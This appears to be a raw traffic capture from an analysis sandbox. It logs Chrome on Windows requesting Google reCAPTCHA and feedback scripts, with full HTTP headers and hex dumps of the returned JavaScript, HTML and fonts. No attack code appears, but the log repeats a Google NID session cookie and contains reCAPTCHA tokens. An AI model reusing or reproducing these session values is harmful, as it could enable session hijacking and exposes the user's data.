                                                                                                                                                                                                                                  Cookie: NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
                                                                                                                                                                                                                                  2024-09-29 04:53:52 UTC749INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                  Expires: Sun, 29 Sep 2024 04:53:52 GMT
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:52 GMT
                                                                                                                                                                                                                                  Cache-Control: private, max-age=300
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  2024-09-29 04:53:52 UTC641INData Raw: 36 35 32 0d 0a 2f 2a 20 50 4c 45 41 53 45 20 44 4f 20 4e 4f 54 20 43 4f 50 59 20 41 4e 44 20 50 41 53 54 45 20 54 48 49 53 20 43 4f 44 45 2e 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 77 3d 77 69 6e 64 6f 77 2c 43 3d 27 5f 5f 5f 67 72 65 63 61 70 74 63 68 61 5f 63 66 67 27 2c 63 66 67 3d 77 5b 43 5d 3d 77 5b 43 5d 7c 7c 7b 7d 2c 4e 3d 27 67 72 65 63 61 70 74 63 68 61 27 3b 76 61 72 20 67 72 3d 77 5b 4e 5d 3d 77 5b 4e 5d 7c 7c 7b 7d 3b 67 72 2e 72 65 61 64 79 3d 67 72 2e 72 65 61 64 79 7c 7c 66 75 6e 63 74 69 6f 6e 28 66 29 7b 28 63 66 67 5b 27 66 6e 73 27 5d 3d 63 66 67 5b 27 66 6e 73 27 5d 7c 7c 5b 5d 29 2e 70 75 73 68 28 66 29 3b 7d 3b 77 5b 27 5f 5f 72 65 63 61 70 74 63 68 61 5f 61 70 69 27 5d 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67
                                                                                                                                                                                                                                  Data Ascii: 652/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.g
                                                                                                                                                                                                                                  2024-09-29 04:53:52 UTC984INData Raw: 59 66 66 78 72 4d 38 54 6d 5a 54 36 52 41 72 57 47 51 56 43 4a 30 4c 52 69 76 44 37 67 6c 63 41 55 41 41 41 43 51 65 79 4a 76 63 6d 6c 6e 61 57 34 69 4f 69 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 64 76 62 32 64 73 5a 53 35 6a 62 32 30 36 4e 44 51 7a 49 69 77 69 5a 6d 56 68 64 48 56 79 5a 53 49 36 49 6b 52 70 63 32 46 69 62 47 56 55 61 47 6c 79 5a 46 42 68 63 6e 52 35 55 33 52 76 63 6d 46 6e 5a 56 42 68 63 6e 52 70 64 47 6c 76 62 6d 6c 75 5a 7a 49 69 4c 43 4a 6c 65 48 42 70 63 6e 6b 69 4f 6a 45 33 4e 44 49 7a 4e 44 49 7a 4f 54 6b 73 49 6d 6c 7a 55 33 56 69 5a 47 39 74 59 57 6c 75 49 6a 70 30 63 6e 56 6c 4c 43 4a 70 63 31 52 6f 61 58 4a 6b 55 47 46 79 64 48 6b 69 4f 6e 52 79 64 57 56 39 27 3b 69 66 28 76 26 26 76 2e 63 6f 6f 6b 69 65 44 65 70 72 65 63 61 74 69
                                                                                                                                                                                                                                  Data Ascii: YffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecati
                                                                                                                                                                                                                                  2024-09-29 04:53:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  141192.168.2.650024216.58.206.684431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:52 UTC1161OUTGET /tools/feedback/chat_load.js HTTP/1.1
                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                  Referer: https://play.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
                                                                                                                                                                                                                                  2024-09-29 04:53:52 UTC893INHTTP/1.1 302 Found
                                                                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:52 GMT
                                                                                                                                                                                                                                  Location: https://www.gstatic.com/feedback/js/ghelp/16uafg9rapvyz/chat_load.js
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-aLHDbe8WD0-ScWhOsexsqQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/asx-frontend-server/
                                                                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /tools/feedback/cspreport
                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups
                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  142192.168.2.650035216.58.206.684431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:53 UTC1470OUTGET /recaptcha/api2/anchor?ar=1&k=6LcA2tEZAAAAAJj7FTYTF9cZ4NL3ShgBCBfkWov0&co=aHR0cHM6Ly9wbGF5Lmdvb2dsZS5jb206NDQz&hl=en&v=xds0rzGrktR88uEZ2JUvdgOY&size=invisible&cb=9vfd1mtb6k9g HTTP/1.1
                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                  sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                  sec-ch-ua-model: ""
                                                                                                                                                                                                                                  sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                  sec-ch-ua-wow64: ?0
                                                                                                                                                                                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                  X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                  Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                  Referer: https://play.google.com/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: NID=518=c0YpqPa6hP2dEuhts22V1K_9pm902kP5V6GIkxAZ1Ba2Gldfrqz9qY6POhM7ZqqmSn2wlud9uWufI-xMJmkbTZtLym1LJj_PVkOjmYX5QDA9V_xhj2gTjZx4AvGPpR5dOg4li48rH0Zbgpv3Wqy6mgCu_DqVvnxQMF1y3xnddiEnCnXICg
                                                                                                                                                                                                                                  2024-09-29 04:53:53 UTC1161INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                  Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:53 GMT
                                                                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-1qw8yorrXTSYazs8UTvq8A' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/recaptcha/1
                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  2024-09-29 04:53:53 UTC229INData Raw: 35 37 34 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 74 69 74 6c 65 3e 72 65 43 41 50 54 43 48 41 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2f 2a 20 63 79
                                                                                                                                                                                                                                  Data Ascii: 574f<!DOCTYPE HTML><html dir="ltr" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>reCAPTCHA</title><style type="text/css">/* cy
                                                                                                                                                                                                                                  2024-09-29 04:53:53 UTC1390INData Raw: 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 32 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 38 2c 20 55 2b 32 30 42 34 2c 20 55 2b 32 44 45 30 2d 32 44 46 46 2c 20 55 2b 41 36 34
                                                                                                                                                                                                                                  Data Ascii: rillic-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu72xKOzY.woff2) format('woff2'); unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A64
                                                                                                                                                                                                                                  2024-09-29 04:53:53 UTC1390INData Raw: 30 41 42 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6d 43 6e 71 45 75 39 32 46 72 31 4d 75 37 47 78 4b 4f 7a 59 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 31 30 30 2d 30 32 41 46 2c 20 55 2b 30 33 30 34 2c 20 55 2b 30 33 30 38 2c 20 55 2b 30 33 32 39 2c 20 55 2b 31 45 30 30
                                                                                                                                                                                                                                  Data Ascii: 0AB;}/* latin-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 400; src: url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu7GxKOzY.woff2) format('woff2'); unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00
                                                                                                                                                                                                                                  2024-09-29 04:53:53 UTC1390INData Raw: 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 45 55 39 66 43 42 63 34 45 73 41 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 31 46 30 30 2d 31 46 46 46 3b 0a 7d 0a 2f 2a 20 67 72 65 65 6b 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45
                                                                                                                                                                                                                                  Data Ascii: s.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fCBc4EsA.woff2) format('woff2'); unicode-range: U+1F00-1FFF;}/* greek */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 500; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqE
                                                                                                                                                                                                                                  2024-09-29 04:53:53 UTC1390INData Raw: 30 33 32 39 2c 20 55 2b 32 30 30 30 2d 32 30 36 46 2c 20 55 2b 32 30 37 34 2c 20 55 2b 32 30 41 43 2c 20 55 2b 32 31 32 32 2c 20 55 2b 32 31 39 31 2c 20 55 2b 32 31 39 33 2c 20 55 2b 32 32 31 32 2c 20 55 2b 32 32 31 35 2c 20 55 2b 46 45 46 46 2c 20 55 2b 46 46 46 44 3b 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 6f 62 6f 74 6f 2f 76 31 38 2f 4b 46 4f 6c 43 6e 71 45 75 39 32 46 72 31 4d 6d 59 55 74
                                                                                                                                                                                                                                  Data Ascii: 0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 900; src: url(//fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmYUt
                                                                                                                                                                                                                                  2024-09-29 04:53:53 UTC1390INData Raw: 38 2d 30 31 32 39 2c 20 55 2b 30 31 36 38 2d 30 31 36 39 2c 20 55 2b 30 31 41 30 2d 30 31 41 31 2c 20 55 2b 30 31 41 46 2d 30 31 42 30 2c 20 55 2b 30 33 30 30 2d 30 33 30 31 2c 20 55 2b 30 33 30 33 2d 30 33 30 34 2c 20 55 2b 30 33 30 38 2d 30 33 30 39 2c 20 55 2b 30 33 32 33 2c 20 55 2b 30 33 32 39 2c 20 55 2b 31 45 41 30 2d 31 45 46 39 2c 20 55 2b 32 30 41 42 3b 0a 7d 0a 2f 2a 20 6c 61 74 69 6e 2d 65 78 74 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 6f 62 6f 74 6f 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72
                                                                                                                                                                                                                                  Data Ascii: 8-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face { font-family: 'Roboto'; font-style: normal; font-weight: 900; src: url(//fonts.gstatic.com/s/r
                                                                                                                                                                                                                                  2024-09-29 04:53:53 UTC1390INData Raw: 22 68 69 64 64 65 6e 22 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 2d 74 6f 6b 65 6e 22 20 76 61 6c 75 65 3d 22 30 33 41 46 63 57 65 41 36 34 4f 79 53 41 79 43 5f 75 71 71 55 54 44 4c 61 70 45 57 36 32 5f 78 71 65 30 64 46 59 33 6f 65 48 43 68 64 34 6f 50 4e 58 31 71 73 45 6d 51 43 57 70 79 36 64 53 35 47 6c 59 6d 77 71 70 55 6d 6a 75 78 44 67 6d 65 4c 53 77 68 48 67 77 51 5f 51 69 74 52 73 6b 69 6a 6e 49 4a 59 56 39 4a 33 4f 52 62 39 5f 61 50 72 31 58 59 55 72 5f 71 6a 34 48 6c 61 52 30 53 54 39 75 69 67 75 77 6a 37 76 73 38 32 58 6b 36 47 47 53 45 78 71 4a 4d 79 45 53 56 71 6e 6d 31 35 43 77 75 36 4b 38 52 48 52 58 43 75 58 56 6d 54 37 5f 66 4b 69 34 69 79 4b 43 78 71 73 6f 31 6e 68 74 53 61 66 36 6f 4f 6c 58 37 74 6e 53 52 56 32 79 32 56 46 66 4b 51 33
                                                                                                                                                                                                                                  Data Ascii: "hidden" id="recaptcha-token" value="03AFcWeA64OySAyC_uqqUTDLapEW62_xqe0dFY3oeHChd4oPNX1qsEmQCWpy6dS5GlYmwqpUmjuxDgmeLSwhHgwQ_QitRskijnIJYV9J3ORb9_aPr1XYUr_qj4HlaR0ST9uiguwj7vs82Xk6GGSExqJMyESVqnm15Cwu6K8RHRXCuXVmT7_fKi4iyKCxqso1nhtSaf6oOlX7tnSRV2y2VFfKQ3
                                                                                                                                                                                                                                  2024-09-29 04:53:53 UTC1390INData Raw: 55 77 72 78 69 74 41 4c 56 6e 39 41 32 33 6c 33 46 64 70 42 47 31 4e 50 63 79 38 33 72 6a 35 48 6c 58 6d 63 32 58 51 35 53 78 4e 36 2d 65 78 50 44 6d 44 63 35 71 66 68 30 52 76 6b 2d 33 6f 61 61 6a 6b 67 6b 50 6a 65 6a 43 35 69 35 30 61 44 4e 5f 63 67 4c 65 70 34 65 68 78 4a 50 69 36 48 52 6d 32 79 6a 47 67 54 70 49 5f 75 6f 43 76 4b 37 44 67 74 58 49 65 4f 33 76 52 47 6b 49 71 47 6f 68 32 78 75 72 43 51 63 5a 66 67 70 4d 37 78 56 69 61 54 49 61 76 37 65 75 51 4d 48 4d 6c 39 42 6c 66 73 63 57 2d 75 36 69 47 53 63 38 70 64 38 38 44 45 42 4c 41 6a 6c 69 6d 70 49 6f 52 43 6d 72 71 42 36 33 67 6f 54 72 45 2d 61 67 4b 63 76 63 67 41 2d 72 53 49 37 6d 56 4a 70 78 37 32 62 76 63 6a 70 62 72 50 79 6d 78 6d 31 64 58 7a 62 59 2d 36 39 77 62 50 37 72 52 73 55 33 31
                                                                                                                                                                                                                                  Data Ascii: UwrxitALVn9A23l3FdpBG1NPcy83rj5HlXmc2XQ5SxN6-exPDmDc5qfh0Rvk-3oaajkgkPjejC5i50aDN_cgLep4ehxJPi6HRm2yjGgTpI_uoCvK7DgtXIeO3vRGkIqGoh2xurCQcZfgpM7xViaTIav7euQMHMl9BlfscW-u6iGSc8pd88DEBLAjlimpIoRCmrqB63goTrE-agKcvcgA-rSI7mVJpx72bvcjpbrPymxm1dXzbY-69wbP7rRsU31
                                                                                                                                                                                                                                  2024-09-29 04:53:53 UTC1390INData Raw: 45 38 72 59 30 39 53 62 44 6c 57 62 30 64 53 59 33 68 30 63 55 56 4a 63 55 59 31 54 57 35 4a 52 55 39 4e 4d 6d 70 4e 64 6d 6f 7a 4e 32 68 75 51 32 68 4d 54 57 74 46 55 44 5a 4d 4e 56 46 6f 62 6e 45 77 4e 56 51 30 5a 6c 6c 55 64 6e 4a 69 61 6a 42 4a 64 44 52 42 4c 32 52 76 64 30 74 50 59 31 55 32 4c 30 70 76 56 45 31 76 61 6e 68 57 63 6b 39 6a 4e 7a 42 47 59 32 4a 51 5a 57 35 58 4d 46 68 59 65 47 6b 32 53 45 74 32 4b 32 4e 4e 59 55 35 72 61 33 4a 54 63 32 39 47 64 6c 70 51 53 54 41 33 61 56 46 49 4e 6b 4e 54 53 6c 70 7a 4f 47 74 44 62 31 51 33 55 79 39 32 64 45 5a 6e 62 79 39 4f 4e 7a 63 34 57 58 64 53 63 47 68 48 4e 56 70 4f 56 31 42 56 51 54 68 6e 51 30 64 30 62 6b 59 35 56 33 68 78 53 55 78 51 56 58 70 52 61 57 6c 61 64 46 4d 31 65 54 55 30 63 57 4a 6c
                                                                                                                                                                                                                                  Data Ascii: E8rY09SbDlWb0dSY3h0cUVJcUY1TW5JRU9NMmpNdmozN2huQ2hMTWtFUDZMNVFobnEwNVQ0ZllUdnJiajBJdDRBL2Rvd0tPY1U2L0pvVE1vanhWck9jNzBGY2JQZW5XMFhYeGk2SEt2K2NNYU5ra3JTc29GdlpQSTA3aVFINkNTSlpzOGtDb1Q3Uy92dEZnby9ONzc4WXdScGhHNVpOV1BVQThnQ0d0bkY5V3hxSUxQVXpRaWladFM1eTU0cWJl
